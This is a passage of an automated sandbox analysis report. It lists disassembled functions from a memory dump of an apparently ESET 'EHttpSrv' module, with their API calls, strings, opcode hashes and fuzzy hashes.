                                                                                                                • Opcode Fuzzy Hash: 15abf14657b2190d1b5379c0b4c59638615587183744a76d11c00b1c5e8c27ef
                                                                                                                • Instruction Fuzzy Hash: EF6104716046058BC720CF98D84079BF3E1FF94704F55CA5AE95587256E3B8EAC7CB82
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s
                                                                                                                • String ID: ($(%d)$)
                                                                                                                • API String ID: 4009619764-2787113179
                                                                                                                • Opcode ID: 018303559dd34487307c3fc249e546da2c14b2a5c1b60a9b5c1aa2dbc6db4a84
                                                                                                                • Instruction ID: b073d46256fe1c90a32a90c35c6f4af868edfb0916f5bbedaa473bab11a98dca
                                                                                                                • Opcode Fuzzy Hash: 018303559dd34487307c3fc249e546da2c14b2a5c1b60a9b5c1aa2dbc6db4a84
                                                                                                                • Instruction Fuzzy Hash: 8F61E4715042059BC720DF9CC88069BF3B6EF98708F45C95DE9499B252E378EAC5CBD2
                                                                                                                APIs
                                                                                                                • WSASetLastError.WS2_32(00000000), ref: 20446E11
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000401), ref: 20446E3A
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 20446E57
                                                                                                                • #2311.MFC80U(?,%s (%s),?,?), ref: 20446EE5
                                                                                                                  • Part of subcall function 20445A50: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 20445AB2
                                                                                                                  • Part of subcall function 20445A50: strcpy_s.MSVCR80 ref: 20445AD8
                                                                                                                  • Part of subcall function 20445A50: strcat_s.MSVCR80 ref: 20445AEF
                                                                                                                  • Part of subcall function 20445A50: LoadLibraryA.KERNEL32(?,?,?,?,-00000001,?,00000008), ref: 20445AFF
                                                                                                                  • Part of subcall function 20445A50: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B0D
                                                                                                                  • Part of subcall function 20445A50: FreeLibrary.KERNEL32(00000000,?,?,?,-00000001,?,00000008), ref: 20445B18
                                                                                                                  • Part of subcall function 20445A50: strcpy_s.MSVCR80 ref: 20445B30
                                                                                                                  • Part of subcall function 20445A50: strcat_s.MSVCR80 ref: 20445B41
                                                                                                                  • Part of subcall function 20445A50: LoadLibraryA.KERNEL32(?), ref: 20445B4B
                                                                                                                  • Part of subcall function 20445A50: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B5F
                                                                                                                  • Part of subcall function 20445A50: FreeLibrary.KERNEL32(00000000), ref: 20445B66
                                                                                                                • #776.MFC80U(?), ref: 20446EEC
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                • #2311.MFC80U(?,%s (%s),?,?), ref: 20446F63
                                                                                                                • #776.MFC80U(?), ref: 20446F71
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$#2311#776AddressByteCharFreeLoadMultiProcWidestrcat_sstrcpy_s$DirectoryErrorLastSystemwcscpy_s
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3711615853-1363028141
                                                                                                                • Opcode ID: f84cf21e986a7fb561d57e1cfd249b6d541893479ae5edc571268b1b06acbe83
                                                                                                                • Instruction ID: fe1e3b47f3a1e4e914dfd1958567bdeffcd6869a864d07879954a62d86137406
                                                                                                                • Opcode Fuzzy Hash: f84cf21e986a7fb561d57e1cfd249b6d541893479ae5edc571268b1b06acbe83
                                                                                                                • Instruction Fuzzy Hash: 5B51E4715083009AE320DBA4CC40BABB3E5EFD4710F51CD2EF69897291EB79A945C7A3
                                                                                                                APIs
                                                                                                                • _wcsicmp.MSVCR80 ref: 2043C9F3
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmpwcscpy_s
                                                                                                                • String ID: @My profile$NAME$NODE$Q$SUBNODE$TYPE
                                                                                                                • API String ID: 3816771565-633031873
                                                                                                                • Opcode ID: 06e1e4c1ceb70e5b99e5a53d2642d5fac0df99db4c19e5f623fd2b02eb955dc6
                                                                                                                • Instruction ID: 32ed0e59955420316cd54525bfdcfdc93ea73d8703fee88b1072996f361bdcbb
                                                                                                                • Opcode Fuzzy Hash: 06e1e4c1ceb70e5b99e5a53d2642d5fac0df99db4c19e5f623fd2b02eb955dc6
                                                                                                                • Instruction Fuzzy Hash: 863126B13402055BC700EFD5CC81BABB7D8EF99659F50D82DFA09C2350DA6DDA448762
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • ${PluginID}=, xrefs: 2043CE9E
                                                                                                                • Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles, xrefs: 2043CF27
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s$wcsncpy_s$LibraryLoad
                                                                                                                • String ID: ${PluginID}=$Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles
                                                                                                                • API String ID: 2742677927-2279858865
                                                                                                                • Opcode ID: 69c8d6371d800003a0a99ebf7cfdaa8ccaa03bbe307884d5313aff03d248baed
                                                                                                                • Instruction ID: 31d593b75fe56d50a8bcdc5a2c71d449045a2e827647018fd79083b8966a06ef
                                                                                                                • Opcode Fuzzy Hash: 69c8d6371d800003a0a99ebf7cfdaa8ccaa03bbe307884d5313aff03d248baed
                                                                                                                • Instruction Fuzzy Hash: 8731B2721443016BD320DB94CC86FEBB3A5EF8C708F548D2CF68597191EAB8E7498796
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeviceDriveQueryType_wcsnicmpswscanf_swcschrwcsncpy_s
                                                                                                                • String ID: ;%c:$\Device\LanmanRedirector\
                                                                                                                • API String ID: 2193757491-3518561738
                                                                                                                • Opcode ID: c43a501eb04d86f05b7fe70faa5bbcd5e9eade08c9e7890deed7aba96727e21b
                                                                                                                • Instruction ID: 792f914edced5409e40d16dff4cb6fdf5b07593157fae891470c0492212408ca
                                                                                                                • Opcode Fuzzy Hash: c43a501eb04d86f05b7fe70faa5bbcd5e9eade08c9e7890deed7aba96727e21b
                                                                                                                • Instruction Fuzzy Hash: E021A272504300ABD310DF94DC46BAB77E8BF98704F80CC2CF695D6251EA79A6498BD3
                                                                                                                APIs
                                                                                                                • #1558.MFC80U(0000042E,00000010,0000000A,00DBEAEB), ref: 20422347
                                                                                                                • SendMessageW.USER32(?,00001208,00000000,?), ref: 20422362
                                                                                                                • #2364.MFC80U(00000000), ref: 20422365
                                                                                                                • SendMessageW.USER32(?,0000120B,?,?), ref: 20422381
                                                                                                                • SendMessageW.USER32(?,0000120C,?,?), ref: 204223A1
                                                                                                                • SendMessageW.USER32(?,0000120C,?,?), ref: 204223CE
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 204223D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1558#2364InvalidateRect
                                                                                                                • String ID: $
                                                                                                                • API String ID: 348224052-3993045852
                                                                                                                • Opcode ID: 1148c658d442e2151bc7ea04e97a48f2f7aef3d4fec40fc2a9f0050c973db9e7
                                                                                                                • Instruction ID: 798c43613874377f5c967f85987ebc91dfb3d139841aa2bef4ee4f89f42f74a9
                                                                                                                • Opcode Fuzzy Hash: 1148c658d442e2151bc7ea04e97a48f2f7aef3d4fec40fc2a9f0050c973db9e7
                                                                                                                • Instruction Fuzzy Hash: 37216FB1640B05AFD320DB69CC86F97B7ECBF98701F008A1DB696C65D0E7B4E5048B51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042D850: #524.MFC80U(00000000,00000000,00000000,FEEA6C22,?,2047ED3A,20479C16,000000FF,204263A6,?,000000B8,FEEA6C22,?,?,?), ref: 2042D87F
                                                                                                                  • Part of subcall function 2042D850: #563.MFC80U(00000000,00000000,00000000,FEEA6C22,?,2047ED3A,20479C16,000000FF,204263A6,?,000000B8,FEEA6C22,?,?,?), ref: 2042D898
                                                                                                                  • Part of subcall function 20462000: #516.MFC80U(0000015E,00000000,00000038,FEEA6C22,-00003AB4,?,2047D956,000000FF,2047088E,?,?,00000165,FEEA6C22,00000003,-00003AB4), ref: 20462030
                                                                                                                  • Part of subcall function 2045EF30: #516.MFC80U(0000024A,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,2047DCBB,000000FF,204708B5,?,?,?,?,?,00000165), ref: 2045EF61
                                                                                                                  • Part of subcall function 2045FDC0: #516.MFC80U(00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6,000000FF,204708CB,?,?,?,?), ref: 2045FDF4
                                                                                                                  • Part of subcall function 2045FDC0: #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6), ref: 2045FE3E
                                                                                                                  • Part of subcall function 2045FDC0: #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6), ref: 2045FE50
                                                                                                                  • Part of subcall function 2045FDC0: GetSystemMetrics.USER32(00000032), ref: 2045FEB5
                                                                                                                  • Part of subcall function 2045FDC0: GetSystemMetrics.USER32(00000031), ref: 2045FEBA
                                                                                                                  • Part of subcall function 2045FDC0: #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FEBF
                                                                                                                  • Part of subcall function 2045FDC0: GetSysColor.USER32(00000005), ref: 2045FEC6
                                                                                                                  • Part of subcall function 2045FDC0: #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FED4
                                                                                                                  • Part of subcall function 2045FDC0: LoadIconW.USER32(00000000,00007F00), ref: 2045FEF3
                                                                                                                  • Part of subcall function 2045FDC0: #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF07
                                                                                                                  • Part of subcall function 2045FDC0: DestroyCursor.USER32(?), ref: 2045FF1E
                                                                                                                  • Part of subcall function 204611D0: #516.MFC80U(00000258,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,?,2047DA78,000000FF,204708E1,?,?,?,?,?), ref: 20461202
                                                                                                                  • Part of subcall function 204611D0: #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000258,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,?,2047DA78,000000FF), ref: 20461250
                                                                                                                  • Part of subcall function 204611D0: GetSystemMetrics.USER32(00000032), ref: 204612B9
                                                                                                                  • Part of subcall function 204611D0: GetSystemMetrics.USER32(00000031), ref: 204612BE
                                                                                                                  • Part of subcall function 204611D0: #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 204612C3
                                                                                                                  • Part of subcall function 204611D0: GetSysColor.USER32(00000005), ref: 204612CA
                                                                                                                  • Part of subcall function 204611D0: #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 204612D8
                                                                                                                  • Part of subcall function 204611D0: LoadIconW.USER32(00000000,00007F00), ref: 204612F1
                                                                                                                  • Part of subcall function 204611D0: #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 20461307
                                                                                                                  • Part of subcall function 204611D0: DestroyCursor.USER32(00000000), ref: 2046131A
                                                                                                                • #762.MFC80U(00000A00,?,?,?,?,?,?,?,?,?,?,00000165,FEEA6C22,00000003,-00003AB4), ref: 20470994
                                                                                                                • #762.MFC80U(0000074C), ref: 204709CB
                                                                                                                • #762.MFC80U(000004F8), ref: 20470A02
                                                                                                                • #977.MFC80U(?), ref: 20470A3D
                                                                                                                • #977.MFC80U(?,?), ref: 20470A4B
                                                                                                                • #977.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 20470A84
                                                                                                                • #977.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 20470A9E
                                                                                                                • #977.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 20470AB2
                                                                                                                • SetRectEmpty.USER32(?), ref: 20470ABE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #977$#1079#516MetricsSystem$#416#762$#1555ColorCursorDestroyIconLoad$#524#563EmptyRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3482417175-0
                                                                                                                • Opcode ID: 712abb72ca72c193c5dcacdc26a3daf60cbf34dc48453cc04d27f88546aabf47
                                                                                                                • Instruction ID: e834abb8702d319562c4f58ddf1d09b58eb6bf8d53996b5fd876976c9c1fc1e2
                                                                                                                • Opcode Fuzzy Hash: 712abb72ca72c193c5dcacdc26a3daf60cbf34dc48453cc04d27f88546aabf47
                                                                                                                • Instruction Fuzzy Hash: 1A817FB05083899FDB25CF69C844BDABBE8AF98704F04852EE5488B250D778A709CF52
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 204375F8
                                                                                                                • CopyRect.USER32(?,?), ref: 20437619
                                                                                                                • IsWindow.USER32(?), ref: 2043762A
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20437648
                                                                                                                • #3395.MFC80U ref: 20437662
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 20437670
                                                                                                                • SendMessageW.USER32(?,0000120B,00000000,00000001), ref: 20437704
                                                                                                                • SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 20437723
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 20437740
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$RectWindow$#3395CopyInvalidateMetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3025489251-0
                                                                                                                • Opcode ID: 04165a8bd1110d92bdb52082952706d917a94f7124bbfd3a28d5fb72b27ad4e5
                                                                                                                • Instruction ID: 2874fc8a2a8ffedec40647df49c84152a99f93a404bc40beea944e09dfcd6218
                                                                                                                • Opcode Fuzzy Hash: 04165a8bd1110d92bdb52082952706d917a94f7124bbfd3a28d5fb72b27ad4e5
                                                                                                                • Instruction Fuzzy Hash: 50414B71204B419FD320DFA9CC85F5BB7E8AB88754F20992DF5E9C3251DB78E8048B22
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$#2311#310#3756#578MessageSendswscanf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3210659254-0
                                                                                                                • Opcode ID: 3c5bde393de6e0bc71d2e7c4a20ddef8a4843513411f941f52a4986c94d93fc3
                                                                                                                • Instruction ID: 36cab569b6b074d02ee9115f48633608569152ae39f8f4dd4006e701a6c31336
                                                                                                                • Opcode Fuzzy Hash: 3c5bde393de6e0bc71d2e7c4a20ddef8a4843513411f941f52a4986c94d93fc3
                                                                                                                • Instruction Fuzzy Hash: FA41E271A087019FC714DF94DC90BAB77E9FB84715F008A3DF8459B291EB399905CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$#2311#310#3756#578MessageSendswscanf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3210659254-0
                                                                                                                • Opcode ID: 361499e3e154a1532808e9da758d4fdb2c358d8ef259a3228fe50c12ec43d848
                                                                                                                • Instruction ID: ea0d6b87ef06e6902964463f505d2c6208afaf29c8ccc4e1efd5cba282a58445
                                                                                                                • Opcode Fuzzy Hash: 361499e3e154a1532808e9da758d4fdb2c358d8ef259a3228fe50c12ec43d848
                                                                                                                • Instruction Fuzzy Hash: 5C4112B16087009FC710CF50CC90BAA77E9FB88714F00CA3DF8559B291EB799905CB92
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20425C73
                                                                                                                • #3756.MFC80U(?), ref: 20425C8F
                                                                                                                • swscanf_s.MSVCR80 ref: 20425CAE
                                                                                                                • #2311.MFC80U(?,2048587C,000000FF), ref: 20425CD1
                                                                                                                • #6063.MFC80U(?), ref: 20425CE1
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20425D3A
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20425D7D
                                                                                                                • #6063.MFC80U(20485878), ref: 20425D92
                                                                                                                • #578.MFC80U ref: 20425DA6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063MessageSend$#2311#310#3756#578swscanf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 858908244-0
                                                                                                                • Opcode ID: ae47bf82d3adab582be4daf17f427c03ee7253ca502987780ecfada004406175
                                                                                                                • Instruction ID: 2e8279aa7f0b3b15c5be8a18cd1982fd12598ec58ccc737625e19ed89ef2adb1
                                                                                                                • Opcode Fuzzy Hash: ae47bf82d3adab582be4daf17f427c03ee7253ca502987780ecfada004406175
                                                                                                                • Instruction Fuzzy Hash: 6F4123716087419FC714CF50DC84B5B77E9FB88714F00CA2EF9548B2A1EB389905CB81
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20424457
                                                                                                                • #3756.MFC80U(?), ref: 20424473
                                                                                                                • swscanf_s.MSVCR80 ref: 20424492
                                                                                                                • #2311.MFC80U(?,2048587C,0000FFFF), ref: 204244B5
                                                                                                                • #6063.MFC80U(?), ref: 204244C5
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 2042451A
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424559
                                                                                                                • #6063.MFC80U(20485878), ref: 2042456A
                                                                                                                • #578.MFC80U ref: 20424582
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
